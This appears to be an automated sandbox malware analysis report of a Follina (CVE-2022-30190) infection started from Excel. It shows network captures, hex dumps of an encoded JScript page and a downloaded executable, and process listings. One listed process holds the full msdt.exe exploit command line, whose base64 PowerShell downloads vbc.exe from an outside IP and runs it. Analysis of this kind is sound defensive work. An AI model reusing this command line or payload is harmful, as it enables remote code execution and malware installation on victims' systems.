                                                                                                                                                          Jun 28, 2022 10:46:37.874927044 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874929905 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874954939 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874958992 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874979019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874984980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.875004053 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.875010967 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.875029087 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.875039101 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.875055075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.875080109 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.875080109 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.875104904 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.875129938 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.875166893 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.990305901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990358114 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990386009 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990408897 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990433931 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990457058 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.990459919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990483999 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990509033 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990520954 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.990533113 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990555048 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990556955 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.990578890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.990602970 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          • 172.245.119.48
                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.449773172.245.119.4880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jun 28, 2022 10:45:23.452174902 CEST1378OUTGET /shipping_invc/document.html HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                          Host: 172.245.119.48
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jun 28, 2022 10:45:23.572532892 CEST1379INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 28 Jun 2022 08:45:23 GMT
                                                                                                                                                          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                                                                                          Last-Modified: Mon, 27 Jun 2022 11:16:27 GMT
                                                                                                                                                          ETag: "54ed-5e26c0d18ab3c"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 21741
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 79 50 45 20 68 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 4c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 63 52 69 70 54 20 0b 54 79 50 45 3d 22 54 65 78 74 2f 6a 73 43 52 69 70 74 2e 45 6e 63 6f 64 65 22 3e 0d 0a 0d 0a 2f 2f 2a 2a 73 54 41 72 54 20 65 6e 63 6f 64 65 2a 2a 0d 0a 0d 0a 23 40 7e 5e 53 31 51 41 41 41 3d 3d 40 23 40 26 40 23 40 26 5e 57 31 6c 59 62 57 09 20 74 4d 2b 57 50 7b 50 45 5c 6b 4f 48 72 7e 50 33 50 4a 55 39 50 29 72 50 2c 5f 7e 4a 26 72 39 4a 7e 50 33 7e 4a 2c 4a 7e 51 2c 4a 77 5e 09 39 6b 29 4d 67 36 72 50 7e 33 50 72 2f 4b 26 6d 72 7e 50 33 50 45 50 72 50 51 7e 72 4f 2f 30 72 4a 2c 50 5f 2c 45 4b 4a 2c 50 33 50 45 50 45 7e 33 50 45 73 7d 2e 4a 2c 50 51 7e 72 5a 32 45 7e 2c 5f 7e 4a 2c 45 2c 5f 7e 72 7a 68 62 44 72 50 2c 51 50 72 62 5c 4a 2c 50 51 7e 72 50 4a 2c 51 50 72 2d 4a 72 7e 51 50 72 71 44 7b 2e 32 45 7e 2c 5f 7e 4a 7e 2e 57 53 3f 6e 57 4b 4a 50 7e 51 2c 4a 2e 73 26 4a 7f 27 45 2c 50 33 50 4a 5b 62 26 50 4a 2c 5f 7e 4a 2c 4a 7e 51 2c 4a 71 3a 6d 53 6d 45 78 31 34 5c 2b 44 74 4b 4e 78 5a 47 55 44 2b 45 50 2c 51 50 72 36 4f 5c 72 50 50 51 7e 72 2b 55 45 72 7e 2c 5f 7e 72 50 72 50 5f 2c 4a 26 50 7b 7e 4a 7e 50 33 50 45 2e 4b 68 2f 7f 6f 57 4d 73 6b 5e 45 7e 50 33 50 72 2b 45 50 7e 51 2c 4a 78 4a 2c 7e 5f 2c 4a 2a 7a 44 5e 60 45 7e 33 50 45 71 41 61 76 5e 63 26 32 6f 60 42 5d 3f 48 64 4b 41 3a 20 4b 41 36 4f 20 7f 31 5a 4b 5b 71 09 6f 54 45 51 2c 5a 5f 6c 4d 54 58 25 51 2c 3b 43 29 44 59 58 25 33 42 69 50 77 25 52 21 6e 3a 3f 4f 49 26 55 54 60 2c 55 35 6b 59 32 73 52 31 36 31 37 2b 5d 4b 59 42 51 2c 3b 74 6c 4d 44 2a 52 5f 24 31 75 29 49 59 2a 52 5f 76 73 5d 36 74 41 29 2f 41 7f 63 6b 59 5d 72 67 6f 60 76 51 5d 6d 75 6c 22 44 32 63 51 45 6a 38 49 5c 31 5a 38 41 6d 30 2c 25 7d 6a 31 50 28 3b 46 4d 28 66 39 47 7d 3f 7a 4f 38 33 77 59 5c 3f 29 78 38 70 67 33 5b 5a 31 7b 39 77 4e 43 28 47 21 6f 65 09 22 33 4a 2e 22 58 31 32 69 54 53 71 46 73 28 7f 78 73 6d 73 49 6f 7d 73 56 3b 6a 6f 49 39 3a 54 63 54 39 46 44 33 38 4d 58 39 28 28 24 5c 5e 55 35 57 28 78 6a 7a 4b 41 46 2d 50 62 2a 33 38 33 53 6b 4a 5a 7e 39 6d 4d 6f 48 6a 79 2e 21 26 66 5a 4c 70 79 74 34 6d 5e 31 73 5b 3b 2a 2e 28 68 56 4e 34 20 22 73 46 2e 38 68 39 7f 42 2f 43 09 74 6f 5e 26 22 34 4e 56 56 25 28 56 2e 63 5b 21 6a 58 38 6b 7e 42 28 78 5d 35 4e 5f 71 6f 6a 2e 78 5c 49 56 2c 66 34 73 36 2d 65 71 49 6a 28 54 7d 61 34 4d 60 47 6a 7f 6c 21 60 43 5d 58 28 33 44 28 50 5a 58 22 4e 5f 39 32 38 73 6d 6f 5e 33 6b 2f 5e 26 22 7a 6d 7f 58 09 71 56 77 21 22 58 58 71 6c 71 2a 54 71 41 2e 66 4a 41 56 45 39 6f 41 5a 6d 6b 7e 7f 65 3a 31 77 7d 58 5e 6f 4a 69 6c 74 38 7f 60 4c 71 5e 73 70 65 62 71 6f 4a 69 6c 74 50 7f 6a 50 60 4d 6f 4e 7d 55 41 59 31 58 7a 4f 6a 56 73 22 6d 38 49 47 5e 09 6a 47 26 2f 49 6f 7f 4c 4b 7f 23 2e 78 48 22 4d 31 26 38 68 58 5c 65 7f 22 69 34 5a 7d 32 38 56 6a 57 5c 2f 53 6b 43 43 22 54 31 66 47 37 53 2e 32 26 74 6b 57 7a 31 47 6a 3b 48 3a 32 58 4a 4e 70 63 64 22 6f 32 48 5a 4f 2b 65 3a 74 45 5c 28 34 56 28 72 53 6b 42 4d 6a 36 4e 4e 77 7d 23 60 39 48 6a 69 67 6d 5b 3a 78 25 64 3a 23 57 7d 55 71 2f 74 5a 53
                                                                                                                                                          Data Ascii: <!DOCTyPE hTML><hTmL><bODy><scRipT TyPE="Text/jsCRipt.Encode">//**sTArT encode**#@~^S1QAAA==@#@&@#@&^W1lYbW tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O 1ZK[qoTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/AckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe"3J."X12iTSqFs(xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9B/Cto^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gjl!`C]X(3D(PZX"N_928smo^3k/^&"zmXqVw!"XXqlq*TqA.fJAVE9oAZmk~e:1w}X^oJilt8`Lq^spebqoJiltPjP`MoN}UAY1XzOjVs"m8IG^jG&/IoLK#.xH"M1&8hX\e"i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NNw}#`9Hjigm[:x%d:#W}Uq/tZS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.449783172.245.119.4880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jun 28, 2022 10:46:37.635595083 CEST11717OUTGET /870/vbc.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                          Host: 172.245.119.48
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jun 28, 2022 10:46:37.757875919 CEST11719INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 28 Jun 2022 08:46:37 GMT
                                                                                                                                                          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                                                                                          Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
                                                                                                                                                          ETag: "6d600-5e278f84f0321"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 448000
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6f 1c 00 00 0a 28 1d 00 00 0a 13 04 2b 00 11 04 2a 13 30 01 00 1a 00 00 00 02 00 00 11 00 28 17 00 00 0a 6f 1e 00 00 0a 6f 1f 00 00 0a 6f 20 00 00 0a 0a 2b 00 06 2a 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 28 17 00 00 0a d0 06 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 7d 00 00 70 0c 2b 10 06 16 9a 74 06 00 00 01 6f 21 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELMb0 @ @@@O H.text `.rsrc@@.reloc @BtH8bH?SJ0}((~t%rp%rp%r1p(&rQp((o{(o{rep((o{(o{(o{(o*0`((o,*tor}p(,o+(o(+*0(ooo +*0;((o,r}p+to!


                                                                                                                                                          Click to jump to process

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:10:44:27
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                          Imagebase:0x1130000
                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:10:45:24
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
                                                                                                                                                          Imagebase:0x1210000
                                                                                                                                                          File size:1508352 bytes
                                                                                                                                                          MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:10:46:00
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
                                                                                                                                                          Imagebase:0x13d0000
                                                                                                                                                          File size:2170976 bytes
                                                                                                                                                          MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:10:46:03
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
                                                                                                                                                          Imagebase:0xd50000
                                                                                                                                                          File size:43176 bytes
                                                                                                                                                          MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:10:46:09
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
                                                                                                                                                          Imagebase:0x13d0000
                                                                                                                                                          File size:2170976 bytes
                                                                                                                                                          MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:10:46:12
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
                                                                                                                                                          Imagebase:0xd50000
                                                                                                                                                          File size:43176 bytes
                                                                                                                                                          MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:10:46:32
                                                                                                                                                          Start date:28/06/2022
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
                                                                                                                                                          Imagebase:0x13d0000
                                                                                                                                                          File size:2170976 bytes
                                                                                                                                                          MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          No disassembly